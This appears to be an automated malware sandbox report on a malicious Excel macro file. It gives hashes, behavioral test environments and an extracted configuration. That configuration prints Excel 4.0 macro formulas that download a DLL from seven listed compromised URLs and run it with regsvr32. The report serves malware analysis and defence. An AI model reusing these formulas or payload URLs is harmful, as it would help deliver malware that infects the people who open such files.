General
-
Target
b907f05c905564ef7e8eed5cbaaeb9104ad0f48f7f0796c16de76081dcadb75d
-
Size
49KB
-
Sample
241120-pymyls1pdj
-
MD5
be65fd6dea8d475432853c459318750b
-
SHA1
fc96655c970f1a9aecc6cf732be7416e4cbd03ca
-
SHA256
b907f05c905564ef7e8eed5cbaaeb9104ad0f48f7f0796c16de76081dcadb75d
-
SHA512
adaaf34a0a3b25bff1596d2c7aab6fa6335c8a356a0c454ce3610e8c8ba9c84b6973aaf60380e57dc6f4554f49efb9f3dbf432855e650150cc14ba0bde9d978c
-
SSDEEP
1536:gkcEEt24xZdRBzH9hJBrdEwwNXekVIcog:RcEe2Kd3zdtdEwo/z
Behavioral task
behavioral1
Sample
b907f05c905564ef7e8eed5cbaaeb9104ad0f48f7f0796c16de76081dcadb75d.xlsm
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
b907f05c905564ef7e8eed5cbaaeb9104ad0f48f7f0796c16de76081dcadb75d.xlsm
Resource
win10v2004-20241007-en
Malware Config
Extracted
https://ballpointmedia.com/css/WDvvKlTTncgkazP/
http://www.altoxi.com/UIc/04GtHAQGA/
http://www.apesb.com/language/IgWs7RRV/
http://www.ara-choob.com/data1/Tzm3xsCsT4DScdUFOx/
http://www.techniquesbroadband.net/pay/Bxp/
http://www.arisgears.com/cgi-bin/dkeY/
https://www.manchesterslt.co.uk/a-to-z-of-slt/rNrJKOM2h/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://ballpointmedia.com/css/WDvvKlTTncgkazP/","..\ujg.dll",0,0) =IF('EGDGB'!F7<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.altoxi.com/UIc/04GtHAQGA/","..\ujg.dll",0,0)) =IF('EGDGB'!F9<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.apesb.com/language/IgWs7RRV/","..\ujg.dll",0,0)) =IF('EGDGB'!F11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.ara-choob.com/data1/Tzm3xsCsT4DScdUFOx/","..\ujg.dll",0,0)) =IF('EGDGB'!F13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.techniquesbroadband.net/pay/Bxp/","..\ujg.dll",0,0)) =IF('EGDGB'!F15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.arisgears.com/cgi-bin/dkeY/","..\ujg.dll",0,0)) =IF('EGDGB'!F17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.manchesterslt.co.uk/a-to-z-of-slt/rNrJKOM2h/","..\ujg.dll",0,0)) =IF('EGDGB'!F19<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\ujg.dll") =RETURN()
Extracted
https://ballpointmedia.com/css/WDvvKlTTncgkazP/
http://www.altoxi.com/UIc/04GtHAQGA/
http://www.apesb.com/language/IgWs7RRV/
http://www.ara-choob.com/data1/Tzm3xsCsT4DScdUFOx/
http://www.techniquesbroadband.net/pay/Bxp/
http://www.arisgears.com/cgi-bin/dkeY/
https://www.manchesterslt.co.uk/a-to-z-of-slt/rNrJKOM2h/
Targets
-
-
Target
b907f05c905564ef7e8eed5cbaaeb9104ad0f48f7f0796c16de76081dcadb75d
-
Size
49KB
-
MD5
be65fd6dea8d475432853c459318750b
-
SHA1
fc96655c970f1a9aecc6cf732be7416e4cbd03ca
-
SHA256
b907f05c905564ef7e8eed5cbaaeb9104ad0f48f7f0796c16de76081dcadb75d
-
SHA512
adaaf34a0a3b25bff1596d2c7aab6fa6335c8a356a0c454ce3610e8c8ba9c84b6973aaf60380e57dc6f4554f49efb9f3dbf432855e650150cc14ba0bde9d978c
-
SSDEEP
1536:gkcEEt24xZdRBzH9hJBrdEwwNXekVIcog:RcEe2Kd3zdtdEwo/z
Score10/10 -